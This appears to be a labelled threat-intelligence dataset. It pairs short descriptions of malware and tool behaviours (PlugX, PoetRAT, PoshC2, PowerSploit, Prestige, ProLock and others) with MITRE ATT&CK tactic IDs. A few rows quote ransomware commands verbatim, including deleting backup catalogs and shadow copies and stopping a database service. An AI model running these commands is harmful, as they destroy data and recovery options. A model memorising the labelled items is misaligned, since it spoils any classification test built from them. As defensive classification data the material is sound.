"PinchDuke steals credentials from compromised hosts. PinchDuke's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware . Credentials targeted by PinchDuke include ones associated with many sources such as Netscape Navigator, Mozilla Firefox, Mozilla Thunderbird, and Internet Explorer.",['TA0006:Credential Access']
PinchDuke collects user files from the compromised host based on predefined file extensions.,['TA0009:Collection']
PinchDuke searches for files created within a certain timeframe and whose file extension matches a predefined list.,['TA0007:Discovery']
"PinchDuke steals credentials from compromised hosts. PinchDuke's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware . Credentials targeted by PinchDuke include ones associated many sources such as WinInet Credential Cache, and Lightweight Directory Access Protocol .",['TA0006:Credential Access']
PinchDuke gathers system configuration information.,['TA0007:Discovery']
PinchDuke transfers files from the compromised host via HTTP or HTTPS to a C2 server.,['TA0011:Command and Control']
Ping can be used to identify remote systems within a network.,['TA0007:Discovery']
PingPull can collect data from a compromised host.,['TA0009:Collection']
PingPull can decrypt received data from its C2 server by using AES.,['TA0005:Defense Evasion']
PingPull has the ability to exfiltrate stolen victim data through its C2 channel.,['TA0010:Exfiltration']
PingPull can enumerate storage volumes and folder contents of a compromised host.,['TA0007:Discovery']
"PingPull can mimic the names and descriptions of legitimate services such as `iphlpsvc`, `IP Helper`, and `Onedrive` to evade detection.",['TA0005:Defense Evasion']
PingPull variants have the ability to communicate with C2 servers using ICMP or TCP.,['TA0011:Command and Control']
PingPull can use HTTPS over port 8080 for C2.,['TA0011:Command and Control']
PingPull can encode C2 traffic with Base64.,['TA0011:Command and Control']
"PingPull can use AES, in cipher block chaining mode padded with PKCS5, to encrypt C2 server communications.",['TA0011:Command and Control']
PingPull can retrieve the hostname of a compromised host.,['TA0007:Discovery']
PingPull can retrieve the IP address of a compromised host.,['TA0007:Discovery']
PingPull has the ability to timestomp a file.,['TA0005:Defense Evasion']
A PingPull variant can communicate with its C2 servers by using HTTPS.,['TA0011:Command and Control']
PingPull can use `cmd.exe` to run various commands as a reverse shell.,['TA0002:Execution']
PingPull has the ability to install itself as a service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
PipeMon installer can use UAC bypass techniques to install the payload.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"PipeMon, its installer, and tools are signed with stolen code-signing certificates.",['TA0005:Defense Evasion']
PipeMon can attempt to gain administrative privileges using token impersonation.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
PipeMon can decrypt password-protected executables.,['TA0005:Defense Evasion']
PipeMon can inject its modules into various processes using reflective DLL loading.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
PipeMon modules are stored encrypted on disk.,['TA0005:Defense Evasion']
PipeMon can switch to an alternate C2 domain when a particular date has been reached.,['TA0011:Command and Control']
PipeMon has stored its encrypted payload in the Registry under `HKLM\SOFTWARE\Microsoft\Print\Components\`.,['TA0005:Defense Evasion']
PipeMon can install additional modules via C2 commands.,['TA0011:Command and Control']
PipeMon modules are stored on disk with seemingly benign names including use of a file extension associated with a popular word processor.,['TA0005:Defense Evasion']
PipeMon has modified the Registry to store its encrypted payload.,['TA0005:Defense Evasion']
PipeMon's first stage has been executed by a call to CreateProcess with the decryption password in an argument. PipeMon has used a call to LoadLibrary to load its installer.,['TA0002:Execution']
The PipeMon communication module can use a custom protocol based on TLS over TCP.,['TA0011:Command and Control']
PipeMon can use parent PID spoofing to elevate privileges.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
The PipeMon installer has modified the Registry key HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors to install PipeMon as a Print Processor.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
PipeMon can iterate over the running processes to find a suitable injection target.,['TA0007:Discovery']
PipeMon can check for the presence of ESET and Kaspersky security software.,['TA0007:Discovery']
PipeMon has used call to LoadLibrary to load its installer. PipeMon loads its modules using reflective loading or custom shellcode.,['TA0002:Execution']
PipeMon communications are RC4 encrypted.,['TA0011:Command and Control']
PipeMon can collect and send OS version and computer name as a part of its C2 beacon.,['TA0007:Discovery']
"PipeMon can collect and send the local IP address, RDP information, and the network adapter physical address as a part of its C2 beacon.",['TA0007:Discovery']
PipeMon can send time zone information from a compromised host to C2.,['TA0007:Discovery']
PipeMon can establish persistence by registering a malicious DLL as an alternative Print Processor which is loaded when the print spooler service starts.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Pisloader uses DNS as its C2 protocol.,['TA0011:Command and Control']
Pisloader has commands to list drives on the victim machine and to list file information for a given directory.,['TA0007:Discovery']
Pisloader has a command to upload a file to the victim machine.,['TA0011:Command and Control']
"Pisloader obfuscates files by splitting strings into smaller sub-strings and including ""garbage"" strings that are never used. The malware also uses return-oriented programming technique and single-byte XOR to obfuscate data.",['TA0005:Defense Evasion']
Pisloader establishes persistence via a Registry Run key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Responses from the Pisloader C2 server are base32-encoded.,['TA0011:Command and Control']
"Pisloader has a command to collect victim system information, including the system name and OS version.",['TA0007:Discovery']
Pisloader has a command to collect the victim's IP address.,['TA0007:Discovery']
Pisloader uses cmd.exe to set the Registry Run key value. It also has a command to spawn a command shell.,['TA0002:Execution']
"Playcrypt encrypts files on targeted hosts with an AES-RSA hybrid encryption, encrypting every other file portion of 0x100000 bytes.",['TA0040:Impact']
"Playcrypt can avoid encrypting files with a .PLAY, .exe, .msi, .dll, .lnk, or .sys file extension.",['TA0007:Discovery']
Playcrypt can use AlphaVSS to delete shadow copies.,['TA0040:Impact']
PlugX has the ability to use DLL search order hijacking for installation on targeted systems.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
PlugX has used DLL side-loading to evade anti-virus.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
PlugX can be configured to use DNS for command and control.,['TA0011:Command and Control']
PlugX uses Pastebin to store C2 addresses.,['TA0011:Command and Control']
PlugX decompresses and decrypts itself using the Microsoft API call RtlDecompressBuffer.,['TA0005:Defense Evasion']
PlugX has a module to enumerate drives and find files recursively.,['TA0007:Discovery']
PlugX can modify the characteristics of folders to hide them from the compromised user.,['TA0005:Defense Evasion']
PlugX has a module to download and execute files on the compromised machine.,['TA0011:Command and Control']
PlugX has a module for capturing keystrokes per process including window titles.,"['TA0009:Collection', 'TA0006:Credential Access']"
"A version of PlugX loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application control techniques.",['TA0005:Defense Evasion']
"In one instance, menuPass added PlugX as a service with a display name of ""Corel Writing Tools Utility.""",['TA0005:Defense Evasion']
PlugX has been disguised as legitimate Adobe and PotPlayer files.,['TA0005:Defense Evasion']
"PlugX has a module to create, delete, or modify Registry keys.",['TA0005:Defense Evasion']
"PlugX can use the Windows API functions `GetProcAddress`, `LoadLibrary`, and `CreateProcess` to execute another process.",['TA0002:Execution']
PlugX has a module to enumerate network shares.,['TA0007:Discovery']
PlugX can be configured to use raw TCP or UDP for command and control.,['TA0011:Command and Control']
PlugX can use API hashing and modify the names of strings to evade detection.,['TA0005:Defense Evasion']
PlugX has a module to list the processes running on a machine.,['TA0007:Discovery']
PlugX can enumerate and query for information contained within the Windows Registry.,['TA0007:Discovery']
PlugX adds Run key entries in the Registry to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
PlugX allows the operator to capture screenshots.,['TA0009:Collection']
PlugX can use RC4 encryption in C2 communications.,['TA0011:Command and Control']
"PlugX checks if VMware tools is running in the background by searching for any process named ""vmtoolsd"".","['TA0005:Defense Evasion', 'TA0007:Discovery']"
PlugX has a module for enumerating TCP and UDP network connections and associated processes using the netstat command.,['TA0007:Discovery']
PlugX can be configured to use HTTP for command and control.,['TA0011:Command and Control']
PlugX allows actors to spawn a reverse shell on a victim.,['TA0002:Execution']
"PlugX can be added as a service to establish persistence. PlugX also has a module to change service configurations as well as start, control, and delete services.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
PoetRAT has the ability to compress files with zip.,['TA0009:Collection']
PoetRAT used TLS to encrypt command and control communications.,['TA0011:Command and Control']
PoetRAT used file system monitoring to track modification and enable automatic exfiltration.,['TA0009:Collection']
PoetRAT has `pyminifier` to obfuscate scripts.,['TA0005:Defense Evasion']
PoetRAT has used a Python tool named Browdec.exe to steal browser credentials.,['TA0006:Credential Access']
PoetRAT has used LZMA and base64 libraries to decode obfuscated scripts.,['TA0005:Defense Evasion']
PoetRAT was delivered with documents using DDE to execute malicious code.,['TA0002:Execution']
PoetRAT has used a .NET tool named dog.exe to exiltrate information over an e-mail account.,['TA0010:Exfiltration']
PoetRAT has exfiltrated data over the C2 channel.,['TA0010:Exfiltration']
PoetRAT has used ftp for exfiltration.,['TA0010:Exfiltration']
PoetRAT has the ability to overwrite scripts and delete itself if a sandbox environment is detected.,['TA0005:Defense Evasion']
PoetRAT has used FTP for C2 communications.,['TA0011:Command and Control']
PoetRAT has the ability to list files upon receiving the ls command from C2.,['TA0007:Discovery']
PoetRAT has the ability to hide and unhide files.,['TA0005:Defense Evasion']
PoetRAT has the ability to copy files and download/upload files into C2 channels using FTP and HTTPS.,['TA0011:Command and Control']
PoetRAT has used a Python tool named klog.exe for keylogging.,"['TA0009:Collection', 'TA0006:Credential Access']"
"PoetRAT used voStro.exe, a compiled pypykatz ), to steal credentials.",['TA0006:Credential Access']
PoetRAT has executed a Lua script through a Lua interpreter for Windows.,['TA0002:Execution']
PoetRAT has used spearphishing attachments to infect victims.,['TA0002:Execution']
PoetRAT has made registry modifications to alter its behavior upon execution.,['TA0005:Defense Evasion']
PoetRAT used TLS to encrypt communications over port 143,['TA0011:Command and Control']
PoetRAT has used a custom encryption scheme for communication between scripts.,['TA0005:Defense Evasion']
PoetRAT has the ability to list all running processes.,['TA0007:Discovery']
PoetRAT was executed with a Python script and worked in conjunction with additional Python-based post-exploitation tools.,['TA0002:Execution']
PoetRAT has added a registry key in the hive for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
PoetRAT used Nmap for remote system discovery.,['TA0007:Discovery']
PoetRAT has the ability to take screen captures.,['TA0009:Collection']
PoetRAT was distributed via malicious Word documents.,['TA0001:Initial Access']
"PoetRAT checked the size of the hard drive to determine if it was being run in a sandbox environment. In the event of sandbox detection, it would delete itself by overwriting the malware scripts with the contents of ""License.txt"" and exiting.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
PoetRAT has the ability to gather information about the compromised host.,['TA0007:Discovery']
"PoetRAT sent username, computer name, and the previously generated UUID in reply to a ""who"" command from C2.",['TA0007:Discovery']
PoetRAT has used a Python tool named Bewmac to record the webcam on compromised hosts.,['TA0009:Collection']
PoetRAT has used Word documents with VBScripts to execute malicious activities.,['TA0002:Execution']
PoetRAT has used HTTP and HTTPs for C2 communications.,['TA0011:Command and Control']
PoetRAT has called cmd through a Word document macro.,['TA0002:Execution']
PoisonIvy creates a Registry key in the Active Setup pointing to a malicious executable.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
PoisonIvy captures window titles.,['TA0007:Discovery']
PoisonIvy creates a backdoor through which remote attackers can steal system information.,['TA0009:Collection']
PoisonIvy can inject a malicious DLL into a process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
PoisonIvy creates a backdoor through which remote attackers can upload files.,['TA0011:Command and Control']
PoisonIvy contains a keylogger.,"['TA0009:Collection', 'TA0006:Credential Access']"
PoisonIvy stages collected data in a text file.,['TA0009:Collection']
PoisonIvy creates a Registry subkey that registers a new system device.,['TA0005:Defense Evasion']
PoisonIvy creates a mutex using either a custom or default value.,['TA0005:Defense Evasion']
PoisonIvy hides any strings related to its own indicators of compromise.,['TA0005:Defense Evasion']
PoisonIvy creates run key Registry entries pointing to a malicious executable dropped to disk.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
PoisonIvy starts a rootkit from a malicious file dropped to disk.,['TA0005:Defense Evasion']
PoisonIvy uses the Camellia cipher to encrypt communications.,['TA0011:Command and Control']
PoisonIvy creates a backdoor through which remote attackers can open a command-line interface.,['TA0002:Execution']
PoisonIvy creates a Registry subkey that registers a new service. PoisonIvy also creates a Registry entry modifying the Logical Disk Manager service to point to a malicious DLL dropped to disk.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"PolyglotDuke can use Twitter, Reddit, Imgur and other websites to get a C2 URL.",['TA0011:Command and Control']
PolyglotDuke can use a custom algorithm to decrypt strings used by the malware.,['TA0005:Defense Evasion']
PolyglotDuke can store encrypted JSON configuration files in the Registry.,['TA0005:Defense Evasion']
PolyglotDuke can retrieve payloads from the C2 server.,['TA0011:Command and Control']
PolyglotDuke can write encrypted JSON configuration files to the Registry.,['TA0005:Defense Evasion']
PolyglotDuke can use LoadLibraryW and CreateProcess to load and execute code.,['TA0002:Execution']
PolyglotDuke can custom encrypt strings.,['TA0005:Defense Evasion']
PolyglotDuke can be executed using rundll32.exe.,['TA0005:Defense Evasion']
PolyglotDuke can use steganography to hide C2 information in images.,['TA0005:Defense Evasion']
PolyglotDuke has has used HTTP GET requests in C2 communications.,['TA0011:Command and Control']
Pony has used scripts to delete itself after execution.,['TA0005:Defense Evasion']
Pony can download additional files onto the infected system.,['TA0011:Command and Control']
Pony has used the NetUserEnum function to enumerate local accounts.,['TA0007:Discovery']
Pony has attempted to lure targets into downloading an attached executable or document .,['TA0002:Execution']
Pony has attempted to lure targets into clicking links in spoofed emails from legitimate banks.,['TA0002:Execution']
Pony has used the Adobe Reader icon for the downloaded file to look more trustworthy.,['TA0005:Defense Evasion']
Pony has used several Windows functions for various purposes.,['TA0002:Execution']
Pony attachments have been delivered via compressed archive files. Pony also obfuscates the memory flow by adding junk instructions when executing to make analysis more difficult.,['TA0005:Defense Evasion']
Pony has used a small dictionary of common passwords against a collected list of local accounts.,['TA0006:Credential Access']
Pony has been delivered via spearphishing attachments.,['TA0001:Initial Access']
Pony has been delivered via spearphishing emails which contained malicious links.,['TA0001:Initial Access']
"Pony has collected the Service Pack, language, and region information to send to the C2.",['TA0007:Discovery']
Pony has delayed execution using a built-in function to avoid detection and analysis.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Pony has sent collected information to the C2 via HTTP POST request.,['TA0011:Command and Control']
Pony has used batch scripts to delete itself after execution.,['TA0002:Execution']
PoshC2 can use Invoke-TokenManipulation for manipulating tokens.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
PoshC2 contains a module for compressing data using ZIP.,['TA0009:Collection']
PoshC2 contains a module for recursively parsing through files and directories to gather valid credit card numbers.,['TA0009:Collection']
PoshC2 has modules for brute forcing local administrator and AD user accounts.,['TA0006:Credential Access']
PoshC2 can utilize multiple methods to bypass UAC.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
PoshC2 can use Invoke-RunAs to make tokens.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
PoshC2 contains modules for searching for passwords in local and remote files.,['TA0006:Credential Access']
PoshC2 can decrypt passwords stored in the RDCMan configuration file.,['TA0006:Credential Access']
PoshC2 can enumerate local and domain user account information.,['TA0007:Discovery']
PoshC2 has modules for enumerating domain trusts.,['TA0007:Discovery']
PoshC2 contains modules for local privilege escalation exploits such as CVE-2016-9192 and CVE-2016-0099.,['TA0004:Privilege Escalation']
PoshC2 contains a module for exploiting SMB via EternalBlue.,['TA0008:Lateral Movement']
PoshC2 can enumerate files on the local file system and includes a module for enumerating recently accessed files.,['TA0007:Discovery']
PoshC2 has modules for keystroke logging and capturing credentials from spoofed Outlook authentication messages.,"['TA0009:Collection', 'TA0006:Credential Access']"
PoshC2 can use Inveigh to conduct name service poisoning for credential theft and associated relay attacks.,"['TA0009:Collection', 'TA0006:Credential Access']"
PoshC2 contains an implementation of Mimikatz to gather credentials from memory.,['TA0006:Credential Access']
PoshC2 can enumerate local and domain user account information.,['TA0007:Discovery']
"PoshC2 contains modules, such as Get-LocAdm for enumerating permission groups.",['TA0007:Discovery']
PoshC2 can perform port scans from an infected host.,['TA0007:Discovery']
PoshC2 contains a module for taking packet captures on compromised hosts.,"['TA0006:Credential Access', 'TA0007:Discovery']"
PoshC2 has a number of modules that leverage pass the hash for lateral movement.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
PoshC2 can use Get-PassPol to enumerate the domain password policy.,['TA0007:Discovery']
"PoshC2 contains multiple modules for injecting into processes, such as Invoke-PSInject.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
PoshC2 contains modules that allow for use of proxies in command and control.,['TA0011:Command and Control']
PoshC2 contains an implementation of PsExec for remote execution.,['TA0002:Execution']
"PoshC2 contains modules, such as Get-ComputerInfo, for enumerating common system information.",['TA0007:Discovery']
PoshC2 can enumerate network adapter information.,['TA0007:Discovery']
PoshC2 contains an implementation of netstat to enumerate TCP and UDP connections.,['TA0007:Discovery']
PoshC2 can enumerate service and service permission information.,['TA0007:Discovery']
PoshC2 can use protocols like HTTP/HTTPS for command and control traffic.,['TA0011:Command and Control']
PoshC2 has a number of modules that use WMI to execute tasks.,['TA0002:Execution']
PoshC2 has the ability to persist on a system using WMI events.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
PowGoop can side-load `Goopdate.dll` into `GoogleUpdate.exe`.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
PowGoop can decrypt PowerShell scripts for execution.,['TA0005:Defense Evasion']
PowGoop can receive encrypted commands from C2.,['TA0011:Command and Control']
PowGoop has disguised a PowerShell script as a .dat file .,['TA0005:Defense Evasion']
PowGoop has used a DLL named Goopdate.dll to impersonate a legitimate Google update file.,['TA0005:Defense Evasion']
PowGoop can use a modified Base64 encoding mechanism to send data to and from the C2 server.,['TA0011:Command and Control']
PowGoop has the ability to use PowerShell scripts to execute commands.,['TA0002:Execution']
PowGoop can send HTTP GET requests to malicious servers.,['TA0011:Command and Control']
Power Loader overwrites Explorer’s Shell_TrayWnd extra window memory to redirect execution to a NTDLL function that is abused to assemble and execute a return-oriented programming chain and create a malicious thread within Explorer.exe.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
PowerDuke has a command to get text of the current foreground window.,['TA0007:Discovery']
PowerDuke has a command to write random data across a file and delete it.,['TA0040:Impact']
PowerDuke has a command to write random data across a file and delete it.,['TA0005:Defense Evasion']
"PowerDuke has commands to get the current directory name as well as the size of a file. It also has commands to obtain information about logical drives, drive type, and free space.",['TA0007:Discovery']
PowerDuke has a command to download a file.,['TA0011:Command and Control']
PowerDuke hides many of its backdoor payloads in an alternate data stream .,['TA0005:Defense Evasion']
PowerDuke has a command to list the victim's processes.,['TA0007:Discovery']
PowerDuke achieves persistence by using various Registry Run keys.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
PowerDuke uses rundll32.exe to load.,['TA0005:Defense Evasion']
"PowerDuke uses steganography to hide backdoors in PNG files, which are also encrypted using the Tiny Encryption Algorithm .",['TA0005:Defense Evasion']
"PowerDuke has commands to get information about the victim's name, build, version, serial number, and memory usage.",['TA0007:Discovery']
PowerDuke has a command to get the victim's domain and NetBIOS name.,['TA0007:Discovery']
PowerDuke has commands to get the current user's name and SID.,['TA0007:Discovery']
"PowerDuke has commands to get the time the machine was built, the time, and the time zone.",['TA0007:Discovery']
PowerDuke runs cmd.exe /c and sends the output to its C2.,['TA0002:Execution']
PowerLess can encrypt browser database files prior to exfiltration.,['TA0009:Collection']
PowerLess has a browser info stealer module that can read Chrome and Edge browser database files.,['TA0007:Discovery']
"PowerLess has the ability to exfiltrate data, including Chrome and Edge browser database files, from compromised machines.",['TA0009:Collection']
PowerLess can use base64 and AES ECB decryption prior to execution of downloaded modules.,['TA0005:Defense Evasion']
PowerLess can use an encrypted channel for C2 communications.,['TA0011:Command and Control']
PowerLess can download additional payloads to a compromised host.,['TA0011:Command and Control']
PowerLess can use a module to log keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
PowerLess can stage stolen browser data in `C:\\Windows\\Temp\\cup.tmp` and keylogger data in `C:\\Windows\\Temp\\Report.06E17A5A-7325-4325-8E5D-E172EBA7FC5BK`.,['TA0009:Collection']
PowerLess is written in and executed via PowerShell without using powershell.exe.,['TA0002:Execution']
PowerPunch can use Base64-encoded scripts.,['TA0005:Defense Evasion']
PowerPunch can use the volume serial number from a target host to generate a unique XOR key for the next stage payload.,['TA0005:Defense Evasion']
PowerPunch can download payloads from adversary infrastructure.,['TA0011:Command and Control']
PowerPunch has the ability to execute through PowerShell.,['TA0002:Execution']
"PowerShower has used 7Zip to compress .txt, .pdf, .xls or .doc files prior to exfiltration.",['TA0009:Collection']
"PowerShower has used a PowerShell document stealer module to pack and exfiltrate .txt, .pdf, .xls or .doc files smaller than 5MB that were modified during the past two days.",['TA0010:Exfiltration']
PowerShower has the ability to remove all files created during the dropper process.,['TA0005:Defense Evasion']
PowerShower has added a registry key so future powershell.exe instances are spawned with coordinates for a window position off-screen by default.,['TA0005:Defense Evasion']
"PowerShower has added a registry key so future powershell.exe instances are spawned off-screen by default, and has removed all registry entries that are left behind during the dropper process.",['TA0005:Defense Evasion']
PowerShower is a backdoor written in PowerShell.,['TA0002:Execution']
PowerShower has the ability to deploy a reconnaissance module to retrieve a list of the active processes.,['TA0007:Discovery']
PowerShower sets up persistence with a Registry run key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
PowerShower has the ability to encode C2 communications with base64 encoding.,['TA0011:Command and Control']
PowerShower has collected system information on the infected host.,['TA0007:Discovery']
PowerShower has the ability to identify the current Windows domain of the infected host.,['TA0007:Discovery']
PowerShower has the ability to identify the current user on the infected host.,['TA0007:Discovery']
PowerShower has the ability to save and execute VBScript.,['TA0002:Execution']
PowerShower has sent HTTP GET and POST requests to C2 servers to send information and receive instructions.,['TA0011:Command and Control']
PowerSploit's Invoke-TokenManipulation Exfiltration module can be used to manipulate tokens.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
PowerSploit's Get-MicrophoneAudio Exfiltration module can record system microphone audio.,['TA0009:Collection']
PowerSploit contains a collection of ScriptModification modules that compress and encode scripts and payloads.,['TA0005:Defense Evasion']
"PowerSploit has several modules that search the Windows Registry for stored credentials: Get-UnattendedInstallFile, Get-Webconfig, Get-ApplicationHost, Get-SiteListPassword, Get-CachedGPPPassword, and Get-RegistryAutoLogon.",['TA0006:Credential Access']
PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit DLL hijacking opportunities in services and processes.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"PowerSploit contains a collection of Exfiltration modules that can access data from local files, volumes, and processes.",['TA0009:Collection']
PowerSploit has modules such as Get-NetDomainTrust and Get-NetForestTrust to enumerate domain and forest trusts.,['TA0007:Discovery']
PowerSploit contains a collection of CodeExecution modules that inject code into a process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
PowerSploit contains a collection of Exfiltration modules that can harvest credentials from Group Policy Preferences.,['TA0006:Credential Access']
PowerSploit's Find-AVSignature AntivirusBypass module can be used to locate single byte anti-virus signatures.,['TA0005:Defense Evasion']
PowerSploit's Invoke-Kerberoast module can request service tickets and return crackable ticket hashes.,['TA0006:Credential Access']
PowerSploit's Get-Keystrokes Exfiltration module can log keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
PowerSploit contains a collection of Exfiltration modules that can harvest credentials using Mimikatz.,['TA0006:Credential Access']
PowerSploit's Get-ProcessTokenGroup Privesc-PowerUp module can enumerate all SIDs associated with its current token.,['TA0007:Discovery']
PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit path interception opportunities in the PATH environment variable.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit search order hijacking vulnerabilities.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit unquoted path vulnerabilities.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
PowerSploit modules are written in and executed via PowerShell.,['TA0002:Execution']
PowerSploit's Get-ProcessTokenPrivilege Privesc-PowerUp module can enumerate privileges for a given process.,['TA0007:Discovery']
PowerSploit contains a collection of Privesc-PowerUp modules that can query Registry keys for potential opportunities.,['TA0007:Discovery']
PowerSploit reflectively loads a Windows PE file into a process.,['TA0005:Defense Evasion']
PowerSploit's New-UserPersistenceOption Persistence argument can be used to establish via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Registry key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
PowerSploit's New-UserPersistenceOption Persistence argument can be used to establish via a Scheduled Task/Job.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
PowerSploit's Get-TimedScreenshot Exfiltration module can take screenshots at regular intervals.,['TA0009:Collection']
PowerSploit's Install-SSP Persistence module can be used to establish by installing a SSP DLL.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
PowerSploit contains a collection of Exfiltration modules that can harvest credentials from Windows vault credential objects.,['TA0006:Credential Access']
PowerSploit's Invoke-WmiCommand CodeExecution module uses WMI to execute and retrieve the output from a PowerShell payload.,['TA0002:Execution']
"PowerSploit contains a collection of Privesc-PowerUp modules that can discover and replace/modify service binaries, paths, and configs.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
PowerStallion uses Microsoft OneDrive as a C2 server via a network drive mapped with net use.,['TA0011:Command and Control']
PowerStallion uses a XOR cipher to encrypt command output written to its OneDrive C2 server.,['TA0005:Defense Evasion']
PowerStallion uses PowerShell loops to iteratively check for available commands in its OneDrive C2 server.,['TA0002:Execution']
PowerStallion has been used to monitor process lists.,['TA0007:Discovery']
PowerStallion modifies the MAC times of its local log files to match that of the victim's desktop.ini file.,['TA0005:Defense Evasion']
Prestige has leveraged the CryptoPP C++ library to encrypt files on target systems using AES and appended filenames with `.enc`.,['TA0040:Impact']
Prestige can traverse the file system to discover files to encrypt by identifying specific extensions defined in a hardcoded list.,['TA0007:Discovery']
Prestige has been deployed using the Default Domain Group Policy Object from an Active Directory Domain Controller.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Prestige can delete the backup catalog from the target system using: `c:\Windows\System32\wbadmin.exe delete catalog -quiet` and can also delete volume shadow copies using: `\Windows\System32\vssadmin.exe delete shadows /all /quiet`.,['TA0040:Impact']
Prestige has the ability to register new registry keys for a new extension handler via `HKCR\.enc` and `HKCR\enc\shell\open\command`.,['TA0005:Defense Evasion']
Prestige has used the `Wow64DisableWow64FsRedirection` and `Wow64RevertWow64FsRedirection` functions to disable and restore file system redirection.,['TA0002:Execution']
Prestige can use PowerShell for payload execution on targeted systems.,['TA0002:Execution']
Prestige has been executed on a target system through a scheduled task created by Sandworm Team using Impacket.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Prestige has attempted to stop the MSSQL Windows service to ensure successful encryption using `C:\Windows\System32\net.exe stop MSSQLSERVER`.,['TA0040:Impact']
"After collecting documents from removable media, Prikormka compresses the collected files, and encrypts it with Blowfish.",['TA0009:Collection']
A module in Prikormka collects passwords stored in applications installed on the victim.,['TA0006:Credential Access']
"A module in Prikormka gathers logins and passwords stored in applications on the victims, including Google Chrome, Mozilla Firefox, and several other browsers.",['TA0006:Credential Access']
Prikormka uses DLL search order hijacking for persistence by saving itself as ntshrui.dll to the Windows directory so it will load before the legitimate ntshrui.dll saved in the System32 subdirectory.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Prikormka contains a module that collects documents with certain extensions from removable media or fixed drives connected via USB.,['TA0009:Collection']
Some resources in Prikormka are encrypted with a simple XOR operation or encoded with Base64.,['TA0005:Defense Evasion']
"After encrypting its own log files, the log encryption module in Prikormka deletes the original, unencrypted files from the host.",['TA0005:Defense Evasion']
"A module in Prikormka collects information about the paths, size, and creation time of files with specific file extensions, but not the actual content of the file.",['TA0007:Discovery']
Prikormka contains a keylogger module that collects keystrokes and the titles of foreground windows.,"['TA0009:Collection', 'TA0006:Credential Access']"
"Prikormka creates a directory, %USERPROFILE%\AppData\Local\SKC\, which is used to store collected log files.",['TA0009:Collection']
A module in Prikormka collects information on available printers and disk drives.,['TA0007:Discovery']
Prikormka adds itself to a Registry Run key with the name guidVGA or guidVSA.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Prikormka uses rundll32.exe to load its DLL.,['TA0005:Defense Evasion']
Prikormka contains a module that captures screenshots of the victim's desktop.,['TA0009:Collection']
A module in Prikormka collects information from the victim about installed anti-virus software.,['TA0007:Discovery']
Prikormka encodes C2 traffic with Base64.,['TA0011:Command and Control']
Prikormka encrypts some C2 traffic with the Blowfish cipher.,['TA0011:Command and Control']
"A module in Prikormka collects information from the victim about Windows OS version, computer name, battery info, and physical memory.",['TA0007:Discovery']
A module in Prikormka collects information from the victim about its IP addresses and MAC addresses.,['TA0007:Discovery']
A module in Prikormka collects information from the victim about the current user name.,['TA0007:Discovery']
ProLock can use BITS jobs to download its malicious payload.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
"ProLock can encrypt files on a compromised host with RC6, and encrypts the key with RSA-1024.",['TA0040:Impact']
ProLock can use CVE-2019-0859 to escalate privileges on a compromised host.,['TA0004:Privilege Escalation']
ProLock can remove files containing its payload after they are executed.,['TA0005:Defense Evasion']
ProLock can use vssadmin.exe to remove volume shadow copies.,['TA0040:Impact']
ProLock can use .jpg and .bmp files to store its payload.,['TA0005:Defense Evasion']
ProLock can use WMIC to execute scripts on targeted hosts.,['TA0002:Execution']
Proton zips up files before exfiltrating them.,['TA0009:Collection']
